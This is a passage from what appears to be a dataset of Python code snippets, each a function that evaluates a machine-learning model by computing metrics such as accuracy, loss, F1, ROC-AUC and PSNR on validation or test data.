torch.clamp(data[:,0], min=0).long()\n\n val_outputs = net(inputs) \n val_loss_size = loss(val_outputs, labels)\n\n correct_inc, total_inc, misclassified_inc = accuracy(val_outputs, \n labels)\n correct += correct_inc\n total += total_inc\n misclassified += misclassified_inc\n total_val_loss += val_loss_size.data.item()\n return correct/total, misclassified", "def evaluate_model():\n\n print '\\n\\tevaluate result'\n os.system('./conlleval.pl -d \\'\\t\\' < ' + encoded_test + ' >> ' + result_file)\n print '\\t--done\\n'", "def evaluate(self):\n\n\t\t## We should be evaluating on dev dataset as well, so commenting x_test\n\t\t#self.model_score = self.model.evaluate(self.x_test, self.y_test_oh, batch_size=2048)\n\t\tself.model_score = self.model.evaluate(self.x_dev, self.y_dev_oh, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\n\t\t##Saving atucal vs predicted predictions\n\t\t##np.argmax returns the index where it see's 1 in the row\n\t\t#y_pred = np.argmax(self.model.predict(self.x_test, batch_size=2048), axis=1)\n\t\ty_pred = np.argmax(self.model.predict(self.x_dev, batch_size=2048), axis=1)\n\n\t\t## vstack will stack them in 2 rows, so we use Trasnpose to get them in column stack\n\t\t#output_predict = np.vstack((np.argmax(self.y_test_oh, axis=1), y_pred)).T\n\t\toutput_predict = np.vstack((np.argmax(self.y_dev_oh, axis=1), y_pred)).T\n\t\toutputFile = self.resultDir + \"/outputPredict.csv\" \n\t\tnp.savetxt(outputFile, output_predict, fmt=\"%5.0f\", delimiter=\",\")\n\n\t\t##Error Analysis of the prediction\n\t\terrorAnalysis(outputFile)\n\n\t\treturn self.model_score", "def evaluate(self, predictor_model) -> Any:\n raise NotImplementedError()", "def evaluate(self, corpus, data_source, args, criterion, iwae=False, num_importance_samples=None):\n # Turn on evaluation mode which disables dropout.\n self.eval()\n total_loss = 0\n ntokens = len(corpus)\n hidden = self.init_hidden(args.batch_size)\n for batch in data_source:\n data, targets = batch.text, batch.target\n output, hidden = self.forward(data, hidden)\n output_flat = output.view(-1, ntokens)\n total_loss += len(data) * args.batch_size * criterion(output_flat, targets.view(-1)).data\n hidden = repackage_hidden(hidden)\n return total_loss[0] / len(data_source.dataset[0].text)", "def evaluate(input_path, model_path, metrics_path):\n\n logger = logging.getLogger(__name__)\n\n logger.info(\"Loading input dataset\")\n dataset = pd.read_csv(input_path)\n\n X_eval = dataset.drop(\"Survived\", axis=1)\n y_eval = dataset[\"Survived\"]\n\n logger.info(\"Loading model\")\n model = joblib.load(model_path)\n\n logger.info(\"Calculating metrics\")\n scorer = metrics.make_scorer(metrics.mean_squared_error)\n cv_results = cross_validate(model, X=X_eval, y=y_eval, scoring=scorer, cv=5)\n\n metric_values = {\"mse\": cv_results[\"test_score\"].mean()}\n\n logger.info(f\"Writing output to {metrics_path}\")\n with open(metrics_path, \"w\") as file_:\n json.dump(metric_values, file_)", "def __evaluate_result(self):\n # Evaluate internally using cophenetic correlation coefficient.\n cpcc = self.__clusterer.calc_cophenetic_coeff()\n \n # Show evaluation through a popup window.\n popup = WarningPopup(self.__gui, 'Clustering evaluation',\n 'Cophenetic correlation coefficient : ' + str(cpcc))\n popup._start()", "def evaluate(self):\n results = dict()\n for metric in self.metrics:\n print('Evaluating clustering with metric %s' % metric)\n if metric in LABEL_METRICS.keys():\n results[metric] = LABEL_METRICS[metric](self.X, self.model.labels_)\n results['adjusted_rand_score'] = SCORE_METRICS['adjusted_rand_score'](self.Y[:, 0], self.model.labels_)\n self.results = results\n return results", "def evaluate_c(self, x, out=None, **kwargs):\n return self._base_nlp.evaluate_c(x, out=out, **kwargs)", "def evaluate(self,\n model,\n x=None,\n y=None,\n batch_size=None,\n verbose=1,\n sample_weight=None,\n steps=None,\n callbacks=None,\n **kwargs):\n raise NotImplementedError()", "def evaluateModel(model, val_data, abs_idx2word, device, batch_size):\n #modify abs_idx2word by removing pad tokens so as to correctly calculate Reouge scores\n abs_idx2word[0] = ''\n\n #data setup\n val_data.move_to(torch.device('cpu')) #keep data on cpu\n val_dataloader = data.DataLoader(val_data, batch_size=batch_size, shuffle=True, num_workers=0)\n #model instantiation\n model = model.to(device=device)\n #evaluation\n logger.debug(f'\\tModel eval on validation data...')\n r1, r2, rl = evaluate.evaluate_model(model, val_dataloader, abs_idx2word, device, print_example=True)\n logger.debug(f'\\nRouge-1 is {r1:.4f}, Rouge-2 is {r2:.4f}, and Rouge-l is {rl:.4f}')", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def baseeval(model, device, val_loader, criterion, args, epoch=0):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4f\")\n top1 = AverageMeter(\"Acc_1\", \":6.2f\")\n top5 = AverageMeter(\"Acc_5\", \":6.2f\")\n progress = ProgressMeter(\n len(val_loader), [batch_time, losses, top1, top5], prefix=\"Test: \"\n )\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n for i, data in enumerate(val_loader):\n images, target = data[0].to(device), data[1].to(device)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i + 1) % args.print_freq == 0:\n progress.display(i)\n\n progress.display(i) # print final results\n\n return top1.avg, top5.avg", "def eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def calc_metrics(model, X, y):\n\n # Get model predictions\n y_predict_r = model.predict(X)\n\n # Calculate evaluation metrics for assesing performance of the model.\n roc = roc_auc_score(y, y_predict_r)\n acc = accuracy_score(y, y_predict_r)\n prec = precision_score(y, y_predict_r)\n rec = recall_score(y, y_predict_r)\n f1 = f1_score(y, y_predict_r)\n\n return {\"acc\": acc, \"roc\": roc, \"prec\": prec, \"rec\": rec, \"f1\": f1}", "def evaluate(clf, loader, args):\n \n res_dict = {\n 'loss' : 0,\n 'acc' : 0\n }\n clf.eval()\n\n criterion = nn.CrossEntropyLoss()\n ncorrect = 0.\n n = 0.\n for x, y in loader:\n if args.cuda:\n x = x.cuda()\n y = y.cuda()\n n += float(x.size(0))\n\n outputs = clf(x)\n\n for i in range(y.size(0)):\n _, ind = outputs[i].max(0)\n\n if torch.equal(y[i], ind):\n ncorrect +=1\n\n loss = criterion(outputs, y)\n\n res_dict['loss'] += loss\n\n res_dict['loss'] = res_dict['loss']/n\n res_dict['loss'] = res_dict['loss'][0].item()\n res_dict['acc'] = ncorrect/n\n clf.train()\n return res_dict", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def _evaluate_model(model, val_loader, criterion, epoch, num_epochs, writer, current_lr, log_every=20):\n\n # Set to eval mode\n model.eval()\n\n y_probs = []\n y_gt = []\n losses = []\n\n for i, (images, label) in enumerate(val_loader):\n\n if torch.cuda.is_available():\n images = [image.cuda() for image in images]\n label = label.cuda()\n\n output = model(images)\n\n loss = criterion(output, label)\n\n loss_value = loss.item()\n losses.append(loss_value)\n\n probas = torch.sigmoid(output)\n\n y_gt.append(int(label.item()))\n y_probs.append(probas.item())\n\n try:\n auc = metrics.roc_auc_score(y_gt, y_probs)\n except:\n auc = 0.5\n\n writer.add_scalar('Val/Loss', loss_value, epoch * len(val_loader) + i)\n writer.add_scalar('Val/AUC', auc, epoch * len(val_loader) + i)\n\n if (i % log_every == 0) & (i > 0):\n print('''[Epoch: {0} / {1} | Batch : {2} / {3} ]| Avg Val Loss {4} | Val AUC : {5} | lr : {6}'''.\n format(\n epoch + 1,\n num_epochs,\n i,\n len(val_loader),\n np.round(np.mean(losses), 4),\n np.round(auc, 4),\n current_lr\n )\n )\n\n writer.add_scalar('Val/AUC_epoch', auc, epoch + i)\n\n val_loss_epoch = np.round(np.mean(losses), 4)\n val_auc_epoch = np.round(auc, 4)\n\n return val_loss_epoch, val_auc_epoch", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def test(eval_loader, model, criterion, epoch, device, config, tf_writer, prepare_embeddings_fn, embedder):\n\n model.eval() # eval mode disables dropout\n\n losses = AverageMeter() # cross entropy loss\n accs = AverageMeter() # accuracies\n\n # Batches\n for _, data in enumerate(eval_loader):\n\n # Perform embedding + padding\n embeddings, labels = prepare_embeddings_fn(data, embedder, device, config)\n\n # Forward prop.\n output = model(embeddings)\n\n # Perform regularization on embedding weights -- not all models support this\n if config.model.use_regularization == \"none\":\n loss = criterion(output[\"logits\"].to(device), labels)\n elif config.model.use_regularization == \"l1\":\n # Regularization on embedding weights\n emb_weights_norm = torch.norm(model.emb_weights, p=1)\n # Loss\n loss = criterion(output[\"logits\"].to(device), labels) + config.model.regularization_lambda * emb_weights_norm # scalar\n else:\n raise NotImplementedError(\"Regularization other than 'none' or 'l1' not supported\")\n\n # Find accuracy\n _, predictions = output[\"logits\"].max(dim=1) # (n_documents)\n correct_predictions = torch.eq(predictions, labels).sum().item()\n accuracy = correct_predictions / labels.size(0)\n\n # Keep track of metrics\n losses.update(loss.item(), labels.size(0))\n accs.update(accuracy, labels.size(0))\n \n try:\n for sentence in data:\n sentence.clear_embeddings()\n except:\n pass\n\n # Print eval status\n print('Evaluation:\\t'\n 'Eval Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Eval Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(loss=losses, acc=accs), flush=True)\n\n # Log the running loss, accuracy\n tf_writer.add_scalar('test loss (avg. epoch)', losses.avg, epoch)\n tf_writer.add_scalar('test accuracy (avg. epoch)', accs.avg, epoch)", "def evaluate(classifier, normalizer, transformer, x, y):\n if normalizer is not None:\n x = normalizer.transform(x)\n\n if transformer is not None:\n x = transformer.transform(x)\n\n preds = classifier.predict(x)\n acc = np.sum(y == preds) / len(y)\n f1 = f1_score(y, preds, average='macro')\n\n print('Accuracy: {:.2%}'.format(acc))\n print('F1 macro: {:.3}'.format(f1))", "def evaluate(model, loss_func, dataloader, metrics):\r\n model.eval()\r\n summ = []\r\n device = utils.get_device()\r\n with torch.no_grad():\r\n for data in dataloader:\r\n sentences1, starts1, ends1, sentences2, starts2, ends2, inputY = data\r\n inputY = inputY.to(device)\r\n output_batch = model(sentences1, starts1, ends1, sentences2, starts2, ends2)\r\n loss = loss_func(output_batch, inputY)\r\n output_batch = output_batch.data.cpu().numpy()\r\n inputY = inputY.data.cpu().numpy()\r\n summary_batch = {metric: metrics[metric](\r\n output_batch, inputY) for metric in metrics}\r\n summary_batch['loss'] = loss.item()\r\n summ.append(summary_batch)\r\n # print(\"summ:{}\".format(summ))\r\n metrics_mean = {metric: np.mean([x[metric]\r\n for x in summ]) for metric in summ[0]}\r\n metrics_string = \" ; \".join(\"{}: {:05.3f}\".format(k, v)\r\n for k, v in metrics_mean.items())\r\n logging.info(\"- Eval metrics : \" + metrics_string)\r\n return metrics_mean", "def evaluate():\n global dictionary, wv\n count = 0\n # To save the scores by distance and similarity\n scores = np.zeros(6)\n similar = np.zeros(6)\n itr = len(dictionary)\n logging.info('running evaluation for {0} samples'.format(itr))\n for key in dictionary:\n progress = (count / itr) * 100\n d = dictionary[key].split('resource/')\n d = [idx.split()[0].translate(table).lower() for idx in d[1:]]\n try:\n r = np.array(list(map(lambda x: wv.get_vector(x), d)),\n dtype=np.float32)\n except KeyError:\n itr -= 1\n continue\n if np.any(np.isnan(r)):\n itr -= 1\n continue\n else:\n if r.ndim == 2:\n try:\n # Mean of vector containing all word vectors\n # obtained from abstract.\n r = r.mean(axis=0).reshape(1, -1)\n \n # Obtain the vectors for the entity\n mean_vec = mean_encoder(dictionary[key])\n mean_vec = mean_vec.reshape(1, -1) / norm(mean_vec)\n mean_dist_vec = distance_encoder(dictionary[key])\n mean_dist_vec = mean_dist_vec.reshape(1, -1)\n mean_dist_vec = mean_dist_vec / norm(mean_dist_vec)\n title_vec = title_mean(key)\n title_vec = title_vec.reshape(1, -1) / norm(title_vec)\n abstract_vec = abstract_encoder(key)\n abstract_vec = abstract_vec.reshape(1, -1)\n abstract_vec = abstract_vec / norm(abstract_vec)\n random_vec = np.random.randn(100).reshape(1, -1)\n zero_vec = np.zeros(100).reshape(1, -1)\n \n # Score the entity vectors\n scores[0] += norm(r - mean_vec)\n scores[1] += norm(r - mean_dist_vec)\n scores[2] += norm(r - title_vec)\n scores[3] += norm(r - abstract_vec)\n scores[4] += norm(r - random_vec)\n scores[5] += norm(r - zero_vec)\n similar[0] += cosine_similarity(r, mean_vec)\n similar[1] += cosine_similarity(r, mean_dist_vec)\n similar[2] += cosine_similarity(r, title_vec)\n similar[3] += cosine_similarity(r, abstract_vec)\n similar[4] += cosine_similarity(r, random_vec)\n similar[5] += cosine_similarity(r, zero_vec)\n count += 1\n print(count, end='\\r')\n except (ValueError, KeyError) as _:\n itr -= 1\n continue\n else:\n itr -= 1\n continue\n # Normalize the scores to get a better\n # comparison against the baselines.\n scores = scores / norm(scores)\n similar = similar / norm(similar)\n print_summary(scores, similar)", "def compare_performance(self):\n\n if self.label_type == \"categorical\":\n self._eval_classifier()\n\n elif self.label_type == \"numerical\":\n self._eval_regressor()\n\n return self.performance_comparison", "def eval_model(net, val_iter):\n correct = 0\n total = 0\n cm = conf.ConfusionMatrix([0, 1])\n net.eval()\n with torch.no_grad():\n for batch in val_iter:\n total += batch.correct.size(0)\n prediction = predict_batch(net, batch)\n cm.add_entry(batch.correct.tolist(), prediction.tolist())\n correct += (prediction == batch.correct).sum().item()\n\n return correct/total, cm.get_f1()", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = model.predict(X_test)\n return classification_report(Y_test, y_pred, target_names = category_names)", "def evaluate_model(model, X_test, Y_test, category_names): \n \n Y_pred = model.predict(X_test)\n print(classification_report(Y_test, Y_pred))\n display_results(Y_test, Y_pred)", "def evaluate(pred_file, ref_file):\n ref_dict, pred_dict, query_dict, id_dict = build_pred_ref_dict(ref_file, pred_file, ref_file)\n total, acc, scores = res_eval_with_type_acc(query_dict, pred_dict, ref_dict, id_dict, save=False)\n em = calculate_exact_match(pred_dict, ref_dict)\n print('Comp Acc: {:.3f}%\\tBleu-4: {:.3f}\\tRouge-L: {:.3f}'.format(acc, scores['Bleu-4'], scores['Rouge-L']))\n print('EM: {:.3f}%'.format(em))\n # calculate_sketch_type_acc(ref_file, pred_file)\n # calculate_exact_match_for_each_q_type(ref_file, pred_file)\n return total, acc, scores, em", "def evaluate_model(model, X_test, Y_test, category_names): \n # predict on the X_test\n y_pred = model.predict(X_test)\n \n # build classification report on every column\n performances = []\n for i in range(len(category_names)):\n performances.append([f1_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro'),\n precision_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro'),\n recall_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro')])\n # build dataframe\n performances = pd.DataFrame(performances, columns=['f1 score', 'precision', 'recall'],\n index = category_names) \n return performances", "def evaluate(self) :\n pass", "def evaluate(data_loader, model, device):\n model.eval()\n\n loss_ = []\n with torch.no_grad():\n for idx, batch in enumerate(data_loader):\n data = batch.to(device)\n outputs = model.forward(data)\n loss_.append(F.l1_loss(outputs, data).data.numpy())\n\n return np.mean(loss_)", "def evaluate_model(args, eval_runs, warm_runs, metrics=['psnr', 'ssim', 'fps']):\n upsampler = Upsampler(args)\n if warm_runs > 0:\n print(\"Warming up for evaluation\")\n for i in range(warm_runs):\n print(\"Performing warm-up run\", str(i+1))\n for sequence in ['foliage', 'walk', 'calendar', 'city']:\n bix_dir = os.path.join(VID4_DIR, 'BIx4', sequence)\n upsampler.run_dir(bix_dir, reset=False)\n \n time = 0.\n psnrs = []\n ssims = []\n for i in range(eval_runs):\n run_psnrs = []\n run_ssims = []\n print(\"Performing evaluation run\", str(i+1))\n for sequence in ['foliage', 'walk', 'calendar', 'city']:\n bix_dir = os.path.join(VID4_DIR, 'BIx4', sequence)\n gt_dir = os.path.join(VID4_DIR, 'GT', sequence)\n print(\"Evaluating on\", bix_dir)\n time += upsampler.run_dir(bix_dir, reset=False)\n vid_psnrs, vid_ssims = _eval_sr_perf(os.path.join(bix_dir, 'up'), gt_dir)\n run_psnrs += vid_psnrs\n run_ssims += vid_ssims\n if i == eval_runs-1:\n with open(os.path.join(upsampler.get_model_dir(), \"psnr.txt\"), \"w\") as f:\n f.writelines(str(psnr) + '\\n' for psnr in run_psnrs)\n with open(os.path.join(upsampler.get_model_dir(), \"ssim.txt\"), \"w\") as f:\n f.writelines(str(ssim) + '\\n' for ssim in run_ssims)\n psnrs += run_psnrs\n ssims += run_ssims\n\n fps = VID4_LENGTH/ (time/eval_runs)\n return Performance(psnr=psnrs, ssim=ssims, fps=fps)", "def train_and_validate(trnK, trnY, valK, valY, Cs):\n models = []\n trn_error = []\n val_error = []\n sup_vect = []\n\n for C in Cs:\n #Training\n model = train(trnK, trnY, C)\n trn_error.append((100 - evaluate(trnK, trnY, model)) / 100)\n sup_vect.append(len(model.get_SV()))\n models.append(model)\n #Evaluate\n val_error.append((100 - evaluate(valK, valY, model)) / 100)\n return(models, trn_error, val_error, sup_vect)", "def evaluate(cfg: DictConfig):\n\n # suppress TensorFlow and DALI warnings\n suppress_warnings()\n\n if cfg.USE_MULTI_GPUS.VALUE:\n # change number of visible gpus for evaluation\n set_gpus(cfg.USE_MULTI_GPUS.GPU_IDS)\n # update batch size according to available gpus\n data_generator.update_batch_size(cfg)\n\n if cfg.OPTIMIZATION.AMP:\n print(\"Enabling Automatic Mixed Precision(AMP) training\")\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_global_policy(policy)\n\n if cfg.OPTIMIZATION.XLA:\n print(\"Enabling Automatic Mixed Precision(XLA) training\")\n tf.config.optimizer.set_jit(True)\n\n # create model\n strategy = None\n if cfg.USE_MULTI_GPUS.VALUE:\n # multi gpu training using tensorflow mirrored strategy\n strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()\n )\n print('Number of visible gpu devices: {}'.format(strategy.num_replicas_in_sync))\n with strategy.scope():\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n else:\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n\n model.compile(\n optimizer=optimizer,\n loss=unet3p_hybrid_loss,\n metrics=[dice_coef],\n )\n\n # weights model path\n checkpoint_path = join_paths(\n cfg.WORK_DIR,\n cfg.CALLBACKS.MODEL_CHECKPOINT.PATH,\n f\"{cfg.MODEL.WEIGHTS_FILE_NAME}.hdf5\"\n )\n\n assert os.path.exists(checkpoint_path), \\\n f\"Model weight's file does not exist at \\n{checkpoint_path}\"\n\n # TODO: verify without augment it produces same results\n # load model weights\n model.load_weights(checkpoint_path, by_name=True, skip_mismatch=True)\n model.summary()\n\n # data generators\n val_generator = data_generator.get_data_generator(cfg, \"VAL\", strategy)\n validation_steps = data_generator.get_iterations(cfg, mode=\"VAL\")\n\n # evaluation metric\n evaluation_metric = \"dice_coef\"\n if len(model.outputs) > 1:\n evaluation_metric = f\"{model.output_names[0]}_dice_coef\"\n\n result = model.evaluate(\n x=val_generator,\n steps=validation_steps,\n workers=cfg.DATALOADER_WORKERS,\n return_dict=True,\n )\n\n # return computed loss, validation accuracy, and it's metric name\n return result, evaluation_metric", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = model.predict(X_test)\n # print the metrics\n for i, col in enumerate(category_names):\n print('{} category metrics: '.format(col))\n print(classification_report(Y_test.iloc[:,i], y_pred[:,i]))", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def evaluate(session, model, char_data, tag_data, dict_data, len_data, eval_op, batch_size, verbose=False):\n correct_labels = 0\n total_labels = 0\n\n xArray, yArray, dArray, lArray = reader.iterator(char_data, tag_data, dict_data, len_data, batch_size)\n yp_wordnum = 0\n yt_wordnum = 0\n cor_num = 0\n for x, y, d, l in zip(xArray, yArray, dArray, lArray):\n fetches = [model.loss, model.logits, model.trans]\n feed_dict = {}\n feed_dict[model.input_data] = x\n feed_dict[model.targets] = y\n feed_dict[model.dicts] = d\n feed_dict[model.seq_len] = l\n loss, logits, trans = session.run(fetches, feed_dict)\n\n for logits_, y_, l_ in zip(logits, y, l):\n logits_ = logits_[:l_]\n y_ = y_[:l_]\n viterbi_sequence, _ = tf.contrib.crf.viterbi_decode(logits_, trans)\n\n yp_wordnum += viterbi_sequence.count(2) + viterbi_sequence.count(3)\n yt_wordnum += (y_ == 2).sum() + (y_ == 3).sum()\n correct_labels += np.sum(np.equal(viterbi_sequence, y_))\n total_labels += l_\n\n start = 0\n for i in range(len(y_)):\n if (y_[i] == 2 or y_[i] == 3):\n flag = True\n for j in range(start, i + 1):\n if y_[j] != viterbi_sequence[j]:\n flag = False\n if flag == True:\n cor_num += 1\n start = i + 1\n P = cor_num / float(yp_wordnum)\n R = cor_num / float(yt_wordnum)\n F = 2 * P * R / (P + R)\n accuracy = 100.0 * correct_labels / float(total_labels)\n return accuracy, P, R, F", "def evaluate_pce(pc_model,pc_coeffs,germ_samples):\n\n\t# Get data set dimensions etc.\n\tn_test_samples = germ_samples.shape[0]\n\tndim = germ_samples.shape[1]\n\tnpce = pc_model.GetNumberPCTerms()\n\n\t# Put PC germ samples in a UQTk array\n\tstd_samples_uqtk = uqtkarray.dblArray2D(n_test_samples, ndim)\n\tstd_samples_uqtk.setnpdblArray(np.asfortranarray(germ_samples))\n\n\t# Numpy array to store all RVs evaluated from sampled PCEs\n\trvs_sampled = np.zeros(n_test_samples)\n\n\t# Evaluate PCE for RVs in each dimension\n\t# Create and fill UQTk array for PC coefficients\n\tc_k_1d_uqtk = uqtkarray.dblArray1D(npce,0.0)\n\tfor ip in range(npce):\n\t\tc_k_1d_uqtk[ip] = pc_coeffs[ip]\n\n\t# Create UQTk array to store outputs in\n\trv_from_pce_uqtk = uqtkarray.dblArray1D(n_test_samples,0.0)\n\n\t# Evaluate the PCEs for each input RV at those random samples\n\tpc_model.EvalPCAtCustPoints(rv_from_pce_uqtk,std_samples_uqtk,c_k_1d_uqtk)\n\n\t# Put evaluated samples in numpy array\n\tfor isamp in range(n_test_samples):\n\t\trvs_sampled[isamp] = rv_from_pce_uqtk[isamp]\n\n\t# Return numpy array of PCE evaluations\n\treturn rvs_sampled", "def evaluate_model(clf_, X_tr, X_te, y_tr, y_te, cls_rpt_tr=False, show=True, cls_labels=None, binary=False):\n \n import sklearn.metrics as metrics\n import matplotlib.pyplot as plt\n from yellowbrick.classifier import ROCAUC\n \n ## Fit and predict \n y_hat_trn, y_hat_tes = fit_n_pred(clf_, X_tr, X_te, y_tr)\n \n if show:\n ## Classification Report / Scores\n if cls_rpt_tr:\n print('Classification Report Train')\n print(metrics.classification_report(y_tr,y_hat_trn))\n else:\n print('Classification Report Test')\n print(metrics.classification_report(y_te,y_hat_tes))\n\n ## Confusion Matrix\n fig, ax = plt.subplots(figsize=(10,5), ncols=2)\n \n metrics.plot_confusion_matrix(clf_,X_te,y_te,cmap=\"YlOrRd\",\n normalize='true',ax=ax[0])\n ax[0].set(title='Confusion Matrix Test Data')\n ax[0].grid(False) \n\n roc = ROCAUC(clf_, classes=cls_labels, ax=ax[1])\n roc.fit(X_tr, y_tr)\n roc.score(X_te, y_te)\n roc.finalize()\n \n plt.tight_layout()\n plt.show()\n \n if binary:\n try:\n imps = plot_importance(clf_, X_tr)\n except:\n imps = None\n \n else:\n return y_hat_trn, y_hat_tes", "def _eval_classifier(self):\n\n y_pred_baseline = self.df_baseline[self.score_column]\n y_pred_sample = self.df_sample[self.score_column]\n\n y_label_baseline = self.df_baseline[self.label_column]\n y_label_sample = self.df_sample[self.label_column]\n\n precision_baseline = precision_score(y_label_baseline, y_pred_baseline)\n recall_baseline = recall_score(y_label_baseline, y_pred_baseline)\n acc_baseline = accuracy_score(y_label_baseline, y_pred_baseline)\n f1_baseline = f1_score(y_label_baseline, y_pred_baseline)\n try:\n auc_baseline = roc_auc_score(y_label_baseline, y_pred_baseline)\n except ValueError:\n auc_baseline = \"NA\"\n\n precision_sample = precision_score(y_label_sample, y_pred_sample)\n recall_sample = recall_score(y_label_sample, y_pred_sample)\n acc_sample = accuracy_score(y_label_sample, y_pred_sample)\n f1_sample = f1_score(y_label_sample, y_pred_sample)\n try:\n auc_sample = roc_auc_score(y_label_sample, y_pred_sample)\n except ValueError:\n auc_sample = \"NA\"\n\n metrics_df = pd.DataFrame(\n {\n \"Accuracy\": [acc_baseline, acc_sample],\n \"Precision\": [precision_baseline, precision_sample],\n \"Recall\": [recall_baseline, recall_sample],\n \"F1\": [f1_baseline, f1_sample],\n \"AUC\": [auc_baseline, auc_sample],\n },\n index=[\"baseline\", \"sample\"],\n )\n\n self.performance_comparison = metrics_df", "def evaluate(dataloader, model):\n with torch.no_grad():\n model.eval()\n count = 0\n correct = 0\n total_loss = 0.0\n reg_loss = 0.0\n l2_lambda = 0.00001\n criterion = nn.BCEWithLogitsLoss()\n for images_data, target_labels in tqdm(dataloader):\n if config.use_gpu:\n images_data = images_data.cuda()\n target_labels = target_labels.cuda()\n predicted_labels = model(images_data)\n total_loss += criterion(predicted_labels, target_labels)\n count += predicted_labels.shape[0]\n preds = predicted_labels.argmax(dim=1)\n targets = target_labels.argmax(dim=1)\n correct += (torch.eq(preds, targets)).sum().item()\n \n l2_reg = torch.tensor(0.)\n if config.use_gpu:\n l2_reg = l2_reg.cuda()\n for param in model.parameters():\n l2_reg += torch.norm(param)\n reg_loss += l2_lambda * l2_reg\n\n total_loss += reg_loss\n accuracy = correct * 1.0 / count\n return accuracy, total_loss.item()", "def evaluate_model(\n self,\n val_loader,\n additional_gpu=None,\n metrics=None,\n inputs_key=\"image\",\n labels_key=\"label\"\n ):\n # predict on the validation set\n all_preds = []\n all_labels = []\n\n self.model.eval()\n\n if additional_gpu is not None:\n device = additional_gpu\n else:\n device = self.device\n\n with torch.no_grad():\n for i, data in enumerate(val_loader):\n inputs, labels = data[inputs_key], data[labels_key]\n inputs = inputs.to(device)\n labels = labels.to(device)\n # forward + backward + optimize\n outputs = self.model(inputs)\n # run inference\n all_preds, all_labels = predict(\n outputs,\n labels,\n all_preds,\n all_labels,\n self.prediction_type,\n self.criterion,\n class_threshold=self.class_threshold\n )\n\n # compute confusion matrix\n cm = confusion_matrix(all_labels, all_preds)\n plt.imshow(cm, interpolation=\"nearest\", cmap=plt.cm.Blues)\n\n # Visualize the confusion matrix\n classes = [\"control\", \"patient\"]\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n 